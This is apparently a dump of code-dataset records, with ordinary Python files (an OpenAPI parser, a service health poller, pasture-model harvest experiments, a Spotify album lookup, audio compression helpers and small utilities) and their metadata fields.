Dict[str, EndpointCollection]: """ Parse the openapi paths data to get EndpointCollections by tag """ endpoints_by_tag: Dict[str, EndpointCollection] = {} for path, path_data in d.items(): for method, method_data in path_data.items(): tag = method_data.get("tags", ["default"])[0] collection = endpoints_by_tag.setdefault(tag, EndpointCollection(tag=tag)) try: endpoint = Endpoint.from_data(data=method_data, path=path, method=method, tag=tag) collection.endpoints.append(endpoint) collection.relative_imports.update(endpoint.relative_imports) except ParseError as e: e.header = f"ERROR parsing {method.upper()} {path} within {tag}. Endpoint will not be generated." collection.parse_errors.append(e) return endpoints_by_tag @dataclass class Endpoint: """ Describes a single endpoint on the server """ path: str method: str description: Optional[str] name: str requires_security: bool tag: str relative_imports: Set[str] = field(default_factory=set) query_parameters: List[Property] = field(default_factory=list) path_parameters: List[Property] = field(default_factory=list) responses: List[Response] = field(default_factory=list) form_body_reference: Optional[Reference] = None json_body: Optional[Property] = None multipart_body_reference: Optional[Reference] = None @staticmethod def parse_request_form_body(body: Dict[str, Any]) -> Optional[Reference]: """ Return form_body_reference """ body_content = body["content"] form_body = body_content.get("application/x-www-form-urlencoded") if form_body: return Reference.from_ref(form_body["schema"]["$ref"]) return None @staticmethod def parse_multipart_body(body: Dict[str, Any]) -> Optional[Reference]: """ Return form_body_reference """ body_content = body["content"] body = body_content.get("multipart/form-data") if body: return Reference.from_ref(body["schema"]["$ref"]) return None @staticmethod def parse_request_json_body(body: Dict[str, Any]) -> Optional[Property]: """ Return json_body """ body_content = body["content"] json_body = body_content.get("application/json") if json_body: return property_from_dict("json_body", required=True, data=json_body["schema"]) return None def _add_body(self, data: Dict[str, Any]) -> None: """ Adds form or JSON body to Endpoint if included in data """ if "requestBody" not in data: return self.form_body_reference = Endpoint.parse_request_form_body(data["requestBody"]) self.json_body = Endpoint.parse_request_json_body(data["requestBody"]) self.multipart_body_reference = Endpoint.parse_multipart_body(data["requestBody"]) if self.form_body_reference: self.relative_imports.add(import_string_from_reference(self.form_body_reference, prefix="..models")) if self.multipart_body_reference: self.relative_imports.add(import_string_from_reference(self.multipart_body_reference, prefix="..models")) if self.json_body is not None: self.relative_imports.update(self.json_body.get_imports(prefix="..models")) def _add_responses(self, data: Dict[str, Any]) -> None: for code, response_dict in data["responses"].items(): response = response_from_dict(status_code=int(code), data=response_dict) if isinstance(response, (RefResponse, ListRefResponse)): self.relative_imports.add(import_string_from_reference(response.reference, prefix="..models")) self.responses.append(response) def _add_parameters(self, data: Dict[str, Any]) -> None: for param_dict in data.get("parameters", []): prop = property_from_dict( name=param_dict["name"], required=param_dict["required"], data=param_dict["schema"] ) self.relative_imports.update(prop.get_imports(prefix="..models")) if param_dict["in"] == ParameterLocation.QUERY: self.query_parameters.append(prop) elif param_dict["in"] == ParameterLocation.PATH: self.path_parameters.append(prop) else: raise ValueError(f"Don't know where to put this parameter: {param_dict}") @staticmethod def from_data(*, data: Dict[str, Any], path: str, method: str, tag: str) -> Endpoint: """ Construct an endpoint from the OpenAPI data """ endpoint = Endpoint( path=path, method=method, description=data.get("description"), name=data["operationId"], requires_security=bool(data.get("security")), tag=tag, ) endpoint._add_parameters(data) endpoint._add_responses(data) endpoint._add_body(data) return endpoint @dataclass class Schema: """ Describes a schema, AKA data model used in requests. These will all be converted to dataclasses in the client """ reference: Reference required_properties: List[Property] optional_properties: List[Property] description: str relative_imports: Set[str] @staticmethod def from_dict(d: Dict[str, Any], name: str) -> Schema: """ A single Schema from its dict representation :param d: Dict representation of the schema :param name: Name by which the schema is referenced, such as a model name. Used to infer the type name if a `title` property is not available. """ required_set = set(d.get("required", [])) required_properties: List[Property] = [] optional_properties: List[Property] = [] relative_imports: Set[str] = set() ref = Reference.from_ref(d.get("title", name)) for key, value in d.get("properties", {}).items(): required = key in required_set p = property_from_dict(name=key, required=required, data=value) if required: required_properties.append(p) else: optional_properties.append(p) relative_imports.update(p.get_imports(prefix="")) schema = Schema( reference=ref, required_properties=required_properties, optional_properties=optional_properties, relative_imports=relative_imports, description=d.get("description", ""), ) return schema @staticmethod def dict(d: Dict[str, Dict[str, Any]]) -> Dict[str, Schema]: """ Get a list of Schemas from an OpenAPI dict """ result = {} for name, data in d.items(): s = Schema.from_dict(data, name=name) result[s.reference.class_name] = s return result @dataclass class OpenAPI: """ Top level OpenAPI document """ title: str description: Optional[str] version: str schemas: Dict[str, Schema] endpoint_collections_by_tag: Dict[str, EndpointCollection] enums: Dict[str, EnumProperty] @staticmethod def from_dict(d: Dict[str, Dict[str, Any]]) -> OpenAPI: """ Create an OpenAPI from dict """ schemas = Schema.dict(d["components"]["schemas"]) endpoint_collections_by_tag = EndpointCollection.from_dict(d["paths"]) enums = EnumProperty.get_all_enums() return OpenAPI( title=d["info"]["title"], description=d["info"].get("description"), version=d["info"]["version"], endpoint_collections_by_tag=endpoint_collections_by_tag, schemas=schemas, enums=enums, )
from __future__ import annotations from dataclasses import dataclass, field from enum import Enum from typing import Any, Dict, Generator, Iterable, List, Optional, Set from .errors import ParseError from .properties import EnumProperty, ListProperty, Property, property_from_dict from .reference import Reference from .responses import ListRefResponse, RefResponse, Response, response_from_dict class ParameterLocation(str, Enum): """ The places Parameters can be put when calling an Endpoint """ QUERY = "query" PATH = "path" def import_string_from_reference(reference: Reference, prefix: str = "") -> str: """ Create a string which is used to import a reference """ return f"from {prefix}.{reference.module_name} import {reference.class_name}" @dataclass class EndpointCollection: """ A bunch of endpoints grouped under a tag that will become a module """ tag: str endpoints: List[Endpoint] = field(default_factory=list) relative_imports: Set[str] = field(default_factory=set) parse_errors: List[ParseError] = field(default_factory=list) @staticmethod def from_dict(d: Dict[str, Dict[str, Dict[str, Any]]]) -> Dict[str, EndpointCollection]: """ Parse the openapi paths data to get EndpointCollections by tag """ endpoints_by_tag: Dict[str, EndpointCollection] = {} for path, path_data in d.items(): for method, method_data in path_data.items(): tag = method_data.get("tags", ["default"])[0] collection = endpoints_by_tag.setdefault(tag, EndpointCollection(tag=tag)) try: endpoint = Endpoint.from_data(data=method_data, path=path, method=method, tag=tag) collection.endpoints.append(endpoint) collection.relative_imports.update(endpoint.relative_imports) except ParseError as e: e.header = f"ERROR parsing {method.upper()} {path} within {tag}. Endpoint will not be generated." collection.parse_errors.append(e) return endpoints_by_tag @dataclass class Endpoint: """ Describes a single endpoint on the server """ path: str method: str description: Optional[str] name: str requires_security: bool tag: str relative_imports: Set[str] = field(default_factory=set) query_parameters: List[Property] = field(default_factory=list) path_parameters: List[Property] = field(default_factory=list) responses: List[Response] = field(default_factory=list) form_body_reference: Optional[Reference] = None json_body: Optional[Property] = None multipart_body_reference: Optional[Reference] = None @staticmethod def parse_request_form_body(body: Dict[str, Any]) -> Optional[Reference]: """ Return form_body_reference """ body_content = body["content"] form_body = body_content.get("application/x-www-form-urlencoded") if form_body: return Reference.from_ref(form_body["schema"]["$ref"]) return None @staticmethod def parse_multipart_body(body: Dict[str, Any]) -> Optional[Reference]: """ Return form_body_reference """ body_content = body["content"] body = body_content.get("multipart/form-data") if body: return Reference.from_ref(body["schema"]["$ref"]) return None @staticmethod def parse_request_json_body(body: Dict[str, Any]) -> Optional[Property]: """ Return json_body """ body_content = body["content"] json_body = body_content.get("application/json") if json_body: return property_from_dict("json_body", required=True, data=json_body["schema"]) return None def _add_body(self, data: Dict[str, Any]) -> None: """ Adds form or JSON body to Endpoint if included in data """ if "requestBody" not in data: return self.form_body_reference = Endpoint.parse_request_form_body(data["requestBody"]) self.json_body = Endpoint.parse_request_json_body(data["requestBody"]) self.multipart_body_reference = Endpoint.parse_multipart_body(data["requestBody"]) if self.form_body_reference: self.relative_imports.add(import_string_from_reference(self.form_body_reference, prefix="..models")) if self.multipart_body_reference: self.relative_imports.add(import_string_from_reference(self.multipart_body_reference, prefix="..models")) if self.json_body is not None: self.relative_imports.update(self.json_body.get_imports(prefix="..models")) def _add_responses(self, data: Dict[str, Any]) -> None: for code, response_dict in data["responses"].items(): response = response_from_dict(status_code=int(code), data=response_dict) if isinstance(response, (RefResponse, ListRefResponse)): self.relative_imports.add(import_string_from_reference(response.reference, prefix="..models")) self.responses.append(response) def _add_parameters(self, data: Dict[str, Any]) -> None: for param_dict in data.get("parameters", []): prop = property_from_dict( name=param_dict["name"], required=param_dict["required"], data=param_dict["schema"] ) self.relative_imports.update(prop.get_imports(prefix="..models")) if param_dict["in"] == ParameterLocation.QUERY: self.query_parameters.append(prop) elif param_dict["in"] == ParameterLocation.PATH: self.path_parameters.append(prop) else: raise ValueError(f"Don't know where to put this parameter: {param_dict}") @staticmethod def from_data(*, data: Dict[str, Any], path: str, method: str, tag: str) -> Endpoint: """ Construct an endpoint from the OpenAPI data """ endpoint = Endpoint( path=path, method=method, description=data.get("description"), name=data["operationId"], requires_security=bool(data.get("security")), tag=tag, ) endpoint._add_parameters(data) endpoint._add_responses(data) endpoint._add_body(data) return endpoint @dataclass class Schema: """ Describes a schema, AKA data model used in requests. These will all be converted to dataclasses in the client """ reference: Reference required_properties: List[Property] optional_properties: List[Property] description: str relative_imports: Set[str] @staticmethod def from_dict(d: Dict[str, Any], name: str) -> Schema: """ A single Schema from its dict representation :param d: Dict representation of the schema :param name: Name by which the schema is referenced, such as a model name. Used to infer the type name if a `title` property is not available. """ required_set = set(d.get("required", [])) required_properties: List[Property] = [] optional_properties: List[Property] = [] relative_imports: Set[str] = set() ref = Reference.from_ref(d.get("title", name)) for key, value in d.get("properties", {}).items(): required = key in required_set p = property_from_dict(name=key, required=required, data=value) if required: required_properties.append(p) else: optional_properties.append(p) relative_imports.update(p.get_imports(prefix="")) schema = Schema( reference=ref, required_properties=required_properties, optional_properties=optional_properties, relative_imports=relative_imports, description=d.get("description", ""), ) return schema @staticmethod def dict(d: Dict[str, Dict[str, Any]]) -> Dict[str, Schema]: """ Get a list of Schemas from an OpenAPI dict """ result = {} for name, data in d.items(): s = Schema.from_dict(data, name=name) result[s.reference.class_name] = s return result @dataclass class OpenAPI: """ Top level OpenAPI document """ title: str description: Optional[str] version: str schemas: Dict[str, Schema] endpoint_collections_by_tag: Dict[str, EndpointCollection] enums: Dict[str, EnumProperty] @staticmethod def from_dict(d: Dict[str, Dict[str, Any]]) -> OpenAPI: """ Create an OpenAPI from dict """ schemas = Schema.dict(d["components"]["schemas"]) endpoint_collections_by_tag = EndpointCollection.from_dict(d["paths"]) enums = EnumProperty.get_all_enums() return OpenAPI( title=d["info"]["title"], description=d["info"].get("description"), version=d["info"]["version"], endpoint_collections_by_tag=endpoint_collections_by_tag, schemas=schemas, enums=enums, )
en
0.795454
The places Parameters can be put when calling an Endpoint Create a string which is used to import a reference A bunch of endpoints grouped under a tag that will become a module Parse the openapi paths data to get EndpointCollections by tag Describes a single endpoint on the server Return form_body_reference Return form_body_reference Return json_body Adds form or JSON body to Endpoint if included in data Construct an endpoint from the OpenAPI data Describes a schema, AKA data model used in requests. These will all be converted to dataclasses in the client A single Schema from its dict representation :param d: Dict representation of the schema :param name: Name by which the schema is referenced, such as a model name. Used to infer the type name if a `title` property is not available. Get a list of Schemas from an OpenAPI dict Top level OpenAPI document Create an OpenAPI from dict
2.527715
3
distributed/scripts/instances_validator.py
jina-ai/stress-test
4
6623588
<gh_stars>1-10 import sys import time import requests import yaml try: with open('_instances.yaml') as f: e2e_ip_dict = yaml.safe_load(f) except FileNotFoundError: raise Exception('Please make sure the previous step has created the instances.yaml file') total_time_to_wait = 120 init_time = time.time() check_until = init_time + total_time_to_wait e2e_ip_validate = {} for instance_name in e2e_ip_dict.copy().keys(): if 'client' in instance_name.lower(): e2e_ip_dict.pop(instance_name) while time.time() < check_until and sum(e2e_ip_validate.values()) != len(e2e_ip_dict): print(f'Sleeping for 2 secs') time.sleep(2) for instance_name, ip in e2e_ip_dict.items(): try: e2e_ip_validate[ip] = True \ if requests.get(f'http://{ip}:8000', timeout=5).status_code == requests.codes.ok \ else False except requests.ConnectionError: print(f'Timeout for {instance_name}:{ip}') e2e_ip_validate[ip] = False print(f'Current status: {e2e_ip_validate}, sleeping for a second!') time.sleep(1) if time.time() > check_until: print(f'Tried to connect to all jinad instances for {total_time_to_wait} secs, timing out now.') sys.exit(1) else: print(f'Hurray! Successfully connected to all JinaD instances. Took ~{time.time() - init_time:.0f} secs')
import sys import time import requests import yaml try: with open('_instances.yaml') as f: e2e_ip_dict = yaml.safe_load(f) except FileNotFoundError: raise Exception('Please make sure the previous step has created the instances.yaml file') total_time_to_wait = 120 init_time = time.time() check_until = init_time + total_time_to_wait e2e_ip_validate = {} for instance_name in e2e_ip_dict.copy().keys(): if 'client' in instance_name.lower(): e2e_ip_dict.pop(instance_name) while time.time() < check_until and sum(e2e_ip_validate.values()) != len(e2e_ip_dict): print(f'Sleeping for 2 secs') time.sleep(2) for instance_name, ip in e2e_ip_dict.items(): try: e2e_ip_validate[ip] = True \ if requests.get(f'http://{ip}:8000', timeout=5).status_code == requests.codes.ok \ else False except requests.ConnectionError: print(f'Timeout for {instance_name}:{ip}') e2e_ip_validate[ip] = False print(f'Current status: {e2e_ip_validate}, sleeping for a second!') time.sleep(1) if time.time() > check_until: print(f'Tried to connect to all jinad instances for {total_time_to_wait} secs, timing out now.') sys.exit(1) else: print(f'Hurray! Successfully connected to all JinaD instances. Took ~{time.time() - init_time:.0f} secs')
none
1
2.582436
3
Pasture_Growth_Modelling/initialisation_support/explore_harvest_parameters.py
Komanawa-Solutions-Ltd/SLMACC-2020-CSRA
0
6623589
""" Author: <NAME> Created: 23/11/2020 11:02 AM """ import ksl_env import pandas as pd import numpy as np import os # add basgra nz functions ksl_env.add_basgra_nz_path() from check_basgra_python.support_for_tests import get_lincoln_broadfield, get_woodward_weather, _clean_harvest from basgra_python import run_basgra_nz from check_basgra_python.support_for_tests import establish_org_input from supporting_functions.plotting import plot_multiple_results def run_old_basgra(): params, matrix_weather, days_harvest, doy_irr = establish_org_input('lincoln') days_harvest = _clean_harvest(days_harvest, matrix_weather) out = run_basgra_nz(params, matrix_weather, days_harvest, doy_irr, verbose=False) return out def run_frequent_harvest(freq, trig, targ): params, matrix_weather, days_harvest, doy_irr = establish_org_input('lincoln') strs = ['{}-{:03d}'.format(e, f) for e, f in matrix_weather[['year', 'doy']].itertuples(False, None)] days_harvest = pd.DataFrame({'year': matrix_weather.loc[:, 'year'], 'doy': matrix_weather.loc[:, 'doy'], 'frac_harv': np.ones(len(matrix_weather)), # set filler values 'harv_trig': np.zeros(len(matrix_weather)) - 1, # set flag to not harvest 'harv_targ': np.zeros(len(matrix_weather)), # set filler values 'weed_dm_frac': np.zeros(len(matrix_weather)), # set filler values }) # start harvesting at the same point harv_days = pd.date_range(start='2011-09-03', end='2017-04-30', freq='{}D'.format(freq)) idx = np.in1d(pd.to_datetime(strs, format='%Y-%j'), harv_days) days_harvest.loc[idx, 'harv_trig'] = trig days_harvest.loc[idx, 'harv_targ'] = targ out = run_basgra_nz(params, matrix_weather, days_harvest, doy_irr, verbose=False) return out if __name__ == '__main__': outdir = ksl_env.shared_drives(r"Z2003_SLMACC\pasture_growth_modelling\basgra_harvest_tuning\irr_harv_testing") data = { 'Woodward_model': run_old_basgra(), } freq = [10, 10, 10] trigs = [1501, 1600, 1700] targs = [1500, 1500, 1500] for f, tr, ta, in zip(freq, trigs, targs): data['freq: {}, Trig:{}, Targ:{}'.format(f, tr, ta)] = run_frequent_harvest(f, tr, ta) plot_multiple_results(data, out_vars=['DM', 'YIELD', 'BASAL', 'DMH_RYE', 'DM_RYE_RM'], outdir=os.path.join(outdir, 'trig_vary')) data = { 'Woodward_model': run_old_basgra(), } freq = [10, 20, 30] trigs = [1501, 1501, 1501] targs = [1500, 1500, 1500] for f, tr, ta, in zip(freq, trigs, targs): data['freq: {}, Trig:{}, Targ:{}'.format(f, tr, ta)] = run_frequent_harvest(f, tr, ta) plot_multiple_results(data, out_vars=['DM', 'YIELD', 'BASAL', 'DMH_RYE', 'DM_RYE_RM'],outdir=os.path.join(outdir, 'freq_vary')) data = { 'Woodward_model': run_old_basgra(), } freq = [10, 10, 10] trigs = [1301, 1501, 1801] targs = [1300, 1500, 1800] for f, tr, ta, in zip(freq, trigs, targs): data['freq: {}, Trig:{}, Targ:{}'.format(f, tr, ta)] = run_frequent_harvest(f, tr, ta) plot_multiple_results(data, out_vars=['DM', 'YIELD', 'BASAL', 'DMH_RYE', 'DM_RYE_RM'], outdir=os.path.join(outdir, 'trag_vary'))
""" Author: <NAME> Created: 23/11/2020 11:02 AM """ import ksl_env import pandas as pd import numpy as np import os # add basgra nz functions ksl_env.add_basgra_nz_path() from check_basgra_python.support_for_tests import get_lincoln_broadfield, get_woodward_weather, _clean_harvest from basgra_python import run_basgra_nz from check_basgra_python.support_for_tests import establish_org_input from supporting_functions.plotting import plot_multiple_results def run_old_basgra(): params, matrix_weather, days_harvest, doy_irr = establish_org_input('lincoln') days_harvest = _clean_harvest(days_harvest, matrix_weather) out = run_basgra_nz(params, matrix_weather, days_harvest, doy_irr, verbose=False) return out def run_frequent_harvest(freq, trig, targ): params, matrix_weather, days_harvest, doy_irr = establish_org_input('lincoln') strs = ['{}-{:03d}'.format(e, f) for e, f in matrix_weather[['year', 'doy']].itertuples(False, None)] days_harvest = pd.DataFrame({'year': matrix_weather.loc[:, 'year'], 'doy': matrix_weather.loc[:, 'doy'], 'frac_harv': np.ones(len(matrix_weather)), # set filler values 'harv_trig': np.zeros(len(matrix_weather)) - 1, # set flag to not harvest 'harv_targ': np.zeros(len(matrix_weather)), # set filler values 'weed_dm_frac': np.zeros(len(matrix_weather)), # set filler values }) # start harvesting at the same point harv_days = pd.date_range(start='2011-09-03', end='2017-04-30', freq='{}D'.format(freq)) idx = np.in1d(pd.to_datetime(strs, format='%Y-%j'), harv_days) days_harvest.loc[idx, 'harv_trig'] = trig days_harvest.loc[idx, 'harv_targ'] = targ out = run_basgra_nz(params, matrix_weather, days_harvest, doy_irr, verbose=False) return out if __name__ == '__main__': outdir = ksl_env.shared_drives(r"Z2003_SLMACC\pasture_growth_modelling\basgra_harvest_tuning\irr_harv_testing") data = { 'Woodward_model': run_old_basgra(), } freq = [10, 10, 10] trigs = [1501, 1600, 1700] targs = [1500, 1500, 1500] for f, tr, ta, in zip(freq, trigs, targs): data['freq: {}, Trig:{}, Targ:{}'.format(f, tr, ta)] = run_frequent_harvest(f, tr, ta) plot_multiple_results(data, out_vars=['DM', 'YIELD', 'BASAL', 'DMH_RYE', 'DM_RYE_RM'], outdir=os.path.join(outdir, 'trig_vary')) data = { 'Woodward_model': run_old_basgra(), } freq = [10, 20, 30] trigs = [1501, 1501, 1501] targs = [1500, 1500, 1500] for f, tr, ta, in zip(freq, trigs, targs): data['freq: {}, Trig:{}, Targ:{}'.format(f, tr, ta)] = run_frequent_harvest(f, tr, ta) plot_multiple_results(data, out_vars=['DM', 'YIELD', 'BASAL', 'DMH_RYE', 'DM_RYE_RM'],outdir=os.path.join(outdir, 'freq_vary')) data = { 'Woodward_model': run_old_basgra(), } freq = [10, 10, 10] trigs = [1301, 1501, 1801] targs = [1300, 1500, 1800] for f, tr, ta, in zip(freq, trigs, targs): data['freq: {}, Trig:{}, Targ:{}'.format(f, tr, ta)] = run_frequent_harvest(f, tr, ta) plot_multiple_results(data, out_vars=['DM', 'YIELD', 'BASAL', 'DMH_RYE', 'DM_RYE_RM'], outdir=os.path.join(outdir, 'trag_vary'))
en
0.407268
Author: <NAME> Created: 23/11/2020 11:02 AM # add basgra nz functions # set filler values # set flag to not harvest # set filler values # set filler values # start harvesting at the same point
2.224565
2
get_spotify_info.py
tanelso2/favorite-albums-webapp
0
6623590
<reponame>tanelso2/favorite-albums-webapp # coding: utf-8 import base64 import configparser import json import requests import sys import urllib.parse def get_client_values(file_loc=None): if file_loc is None: file_loc = sys.argv[1] config = configparser.ConfigParser() config.read(file_loc) return config["Spotify"]["client_id"], config["Spotify"]["client_secret"] def get_auth_token(): client_id, client_secret = get_client_values() auth_field = f"{client_id}:{client_secret}" auth_field = auth_field.encode('utf-8') encoded_auth_header = base64.b64encode(auth_field) headers = {"Authorization": "Basic {}".format(encoded_auth_header.decode('utf-8'))} body = {"grant_type": "client_credentials"} spotify_auth_url = "https://accounts.spotify.com/api/token" r = requests.post(spotify_auth_url, headers=headers, data=body) return r.json()['access_token'] def need_exact_match(album, artist): overrides = [ # Needed to get past the Love Pts 1 & 2 double album. # Part 2 is merely meh ['Love, Pt. 1', 'Angels & Airwaves'] ] for o_album, o_artist in overrides: if album == o_album and artist == o_artist: return True return False def get_album_information(album, artist, auth_token=None): if auth_token is None: auth_token = get_auth_token() search_url = "https://api.spotify.com/v1/search" query = f"album:{album} artist:{artist}" encoded_query_str = urllib.parse.urlencode({"q": query, "type": "album", "limit": 50}) headers = {"Authorization": f"Bearer {auth_token}"} r = requests.get(f"{search_url}?{encoded_query_str}", headers=headers) if need_exact_match(album, artist): for info in r.json()['albums']['items']: i_artist = info["artists"][0]["name"] i_album = info["name"] if i_artist == artist and i_album == album: return info # For debugging errors: # print(f'{album} by {artist}') return r.json()['albums']['items'][0] def parse_spotify_album_info(album_info): album_name = album_info["name"] album_url = album_info["external_urls"]["spotify"] artist = album_info["artists"][0] artist_url = artist["external_urls"]["spotify"] artist_name = artist["name"] images = album_info["images"] #Preserve all the images. # Just in case I want to add logic to switch # to smaller images on smaller devices return {"album-name": album_name, "album-url": album_url, "artist-name": artist_name, "artist-url": artist_url, "images": images} def get_album_list(): with open('favorites.txt', 'r') as f: data = f.read().strip() albums = data.split('\n') def parse_album_info(line): parts = line.split(' by ') album, artist = parts return {"album": album, "artist": artist} return [parse_album_info(x) for x in albums] album_list = get_album_list() auth_token = get_auth_token() album_infos = [get_album_information(x["album"], x["artist"], auth_token=auth_token) for x in album_list] output = [parse_spotify_album_info(x) for x in album_infos] print(json.dumps(output))
# coding: utf-8 import base64 import configparser import json import requests import sys import urllib.parse def get_client_values(file_loc=None): if file_loc is None: file_loc = sys.argv[1] config = configparser.ConfigParser() config.read(file_loc) return config["Spotify"]["client_id"], config["Spotify"]["client_secret"] def get_auth_token(): client_id, client_secret = get_client_values() auth_field = f"{client_id}:{client_secret}" auth_field = auth_field.encode('utf-8') encoded_auth_header = base64.b64encode(auth_field) headers = {"Authorization": "Basic {}".format(encoded_auth_header.decode('utf-8'))} body = {"grant_type": "client_credentials"} spotify_auth_url = "https://accounts.spotify.com/api/token" r = requests.post(spotify_auth_url, headers=headers, data=body) return r.json()['access_token'] def need_exact_match(album, artist): overrides = [ # Needed to get past the Love Pts 1 & 2 double album. # Part 2 is merely meh ['Love, Pt. 1', 'Angels & Airwaves'] ] for o_album, o_artist in overrides: if album == o_album and artist == o_artist: return True return False def get_album_information(album, artist, auth_token=None): if auth_token is None: auth_token = get_auth_token() search_url = "https://api.spotify.com/v1/search" query = f"album:{album} artist:{artist}" encoded_query_str = urllib.parse.urlencode({"q": query, "type": "album", "limit": 50}) headers = {"Authorization": f"Bearer {auth_token}"} r = requests.get(f"{search_url}?{encoded_query_str}", headers=headers) if need_exact_match(album, artist): for info in r.json()['albums']['items']: i_artist = info["artists"][0]["name"] i_album = info["name"] if i_artist == artist and i_album == album: return info # For debugging errors: # print(f'{album} by {artist}') return r.json()['albums']['items'][0] def parse_spotify_album_info(album_info): album_name = album_info["name"] album_url = album_info["external_urls"]["spotify"] artist = album_info["artists"][0] artist_url = artist["external_urls"]["spotify"] artist_name = artist["name"] images = album_info["images"] #Preserve all the images. # Just in case I want to add logic to switch # to smaller images on smaller devices return {"album-name": album_name, "album-url": album_url, "artist-name": artist_name, "artist-url": artist_url, "images": images} def get_album_list(): with open('favorites.txt', 'r') as f: data = f.read().strip() albums = data.split('\n') def parse_album_info(line): parts = line.split(' by ') album, artist = parts return {"album": album, "artist": artist} return [parse_album_info(x) for x in albums] album_list = get_album_list() auth_token = get_auth_token() album_infos = [get_album_information(x["album"], x["artist"], auth_token=auth_token) for x in album_list] output = [parse_spotify_album_info(x) for x in album_infos] print(json.dumps(output))
en
0.833905
# coding: utf-8 # Needed to get past the Love Pts 1 & 2 double album. # Part 2 is merely meh # For debugging errors: # print(f'{album} by {artist}') #Preserve all the images. # Just in case I want to add logic to switch # to smaller images on smaller devices
3.006002
3
setup.py
allanlwu/allangdrive
0
6623591
import setuptools setuptools.setup( name="allangdrive", version='0.1.0', url="https://github.com/allanlwu/allangdrive", author="<NAME>", description="Jupyter extension to allow user to sync files to Google Drive", packages=setuptools.find_packages(), install_requires=[ 'notebook', ], package_data={'allangdrive': ['static/*']}, )
import setuptools setuptools.setup( name="allangdrive", version='0.1.0', url="https://github.com/allanlwu/allangdrive", author="<NAME>", description="Jupyter extension to allow user to sync files to Google Drive", packages=setuptools.find_packages(), install_requires=[ 'notebook', ], package_data={'allangdrive': ['static/*']}, )
none
1
1.680476
2
web_app/services/basilica_service.py
diegoarriola1/twitoff-pt5
0
6623592
<filename>web_app/services/basilica_service.py<gh_stars>0 # web_app/services/basilica_services.py import basilica import os from dotenv import load_dotenv load_dotenv() # parese the .env file for environment variables BASILICA_API_KEY = os.getenv("BASILICA_API_KEY") connection = basilica.Connection(BASILICA_API_KEY) print(type(connection)) if __name__ == "__main__": sentences = ["Hello world!", "How are you?"] embeddings = connection.embed_sentences(sentences) print(list(embeddings))
<filename>web_app/services/basilica_service.py<gh_stars>0 # web_app/services/basilica_services.py import basilica import os from dotenv import load_dotenv load_dotenv() # parese the .env file for environment variables BASILICA_API_KEY = os.getenv("BASILICA_API_KEY") connection = basilica.Connection(BASILICA_API_KEY) print(type(connection)) if __name__ == "__main__": sentences = ["Hello world!", "How are you?"] embeddings = connection.embed_sentences(sentences) print(list(embeddings))
en
0.677756
# web_app/services/basilica_services.py # parese the .env file for environment variables
2.20524
2
EDA/compress_audio/__init__.py
W210-Audio-Upscaling/Audio-Upscaling
0
6623593
from ffmpy import FFmpeg import os, glob class Normalize_Audio(): def __init__(self): ''' Constructor for this class. ''' pass def normalize(infile,bitrate): filename=os.path.splitext(os.path.split(infile)[1])[0] filepath=os.path.dirname(infile)+"\\normalized" try: os.mkdir(filepath) except OSError: pass ff = FFmpeg(inputs={infile: None},outputs={'%s\%s_normalized.mp3'%(filepath,filename): '-ac 1 -ab %s'%(bitrate)}) ff.run() return print("File Normalized") def compress(infile,bitrate): filename=os.path.splitext(os.path.split(infile)[1])[0] filepath=os.path.dirname(infile)+"\\compressed" try: os.mkdir(filepath) except OSError: pass ff = FFmpeg(inputs={infile: None},outputs={'%s\%s_compressed.mp3'%(filepath,filename): '-ac 1 -ab %s'%(bitrate)}) ff.run() return print("File Compressed")
from ffmpy import FFmpeg import os, glob class Normalize_Audio(): def __init__(self): ''' Constructor for this class. ''' pass def normalize(infile,bitrate): filename=os.path.splitext(os.path.split(infile)[1])[0] filepath=os.path.dirname(infile)+"\\normalized" try: os.mkdir(filepath) except OSError: pass ff = FFmpeg(inputs={infile: None},outputs={'%s\%s_normalized.mp3'%(filepath,filename): '-ac 1 -ab %s'%(bitrate)}) ff.run() return print("File Normalized") def compress(infile,bitrate): filename=os.path.splitext(os.path.split(infile)[1])[0] filepath=os.path.dirname(infile)+"\\compressed" try: os.mkdir(filepath) except OSError: pass ff = FFmpeg(inputs={infile: None},outputs={'%s\%s_compressed.mp3'%(filepath,filename): '-ac 1 -ab %s'%(bitrate)}) ff.run() return print("File Compressed")
en
0.727852
Constructor for this class.
2.988053
3
CodeWars/Unique_number.py
srisrinu1/Interview-solved
46
6623594
<filename>CodeWars/Unique_number.py ###This one is from a problem I soved on codewars in my beginner level #Qustion '''There is an array with some numbers. All numbers are equal except for one. Try to find it! find_uniq([ 1, 1, 1, 2, 1, 1 ]) == 2 find_uniq([ 0, 0, 0.55, 0, 0 ]) == 0.55 It’s guaranteed that array contains at least 3 numbers. The tests contain some very huge arrays, so think about performance. ''' #Solution def find_uniq(arr): if arr[0] != arr[1]: if arr[0] != arr[2]: return arr[0] else: return arr[1] else: for i in arr[2:]: if i != arr[0]: return i
<filename>CodeWars/Unique_number.py ###This one is from a problem I soved on codewars in my beginner level #Qustion '''There is an array with some numbers. All numbers are equal except for one. Try to find it! find_uniq([ 1, 1, 1, 2, 1, 1 ]) == 2 find_uniq([ 0, 0, 0.55, 0, 0 ]) == 0.55 It’s guaranteed that array contains at least 3 numbers. The tests contain some very huge arrays, so think about performance. ''' #Solution def find_uniq(arr): if arr[0] != arr[1]: if arr[0] != arr[2]: return arr[0] else: return arr[1] else: for i in arr[2:]: if i != arr[0]: return i
en
0.909465
###This one is from a problem I soved on codewars in my beginner level #Qustion There is an array with some numbers. All numbers are equal except for one. Try to find it! find_uniq([ 1, 1, 1, 2, 1, 1 ]) == 2 find_uniq([ 0, 0, 0.55, 0, 0 ]) == 0.55 It’s guaranteed that array contains at least 3 numbers. The tests contain some very huge arrays, so think about performance. #Solution
3.962338
4
manage.py
zjmeow/HelloFlask
0
6623595
#coding:utf8 from flask_migrate import MigrateCommand , Migrate from app import create_app,db from flask_script import Manager app = create_app() manager = Manager(app) migrate = Migrate(app,db) manager.add_command('db',MigrateCommand) if __name__ == '__main__': app.run(host='0.0.0.0') # manager.run()
#coding:utf8 from flask_migrate import MigrateCommand , Migrate from app import create_app,db from flask_script import Manager app = create_app() manager = Manager(app) migrate = Migrate(app,db) manager.add_command('db',MigrateCommand) if __name__ == '__main__': app.run(host='0.0.0.0') # manager.run()
ru
0.232704
#coding:utf8 # manager.run()
1.887012
2
jinete/storers/sets.py
garciparedes/rider
5
6623596
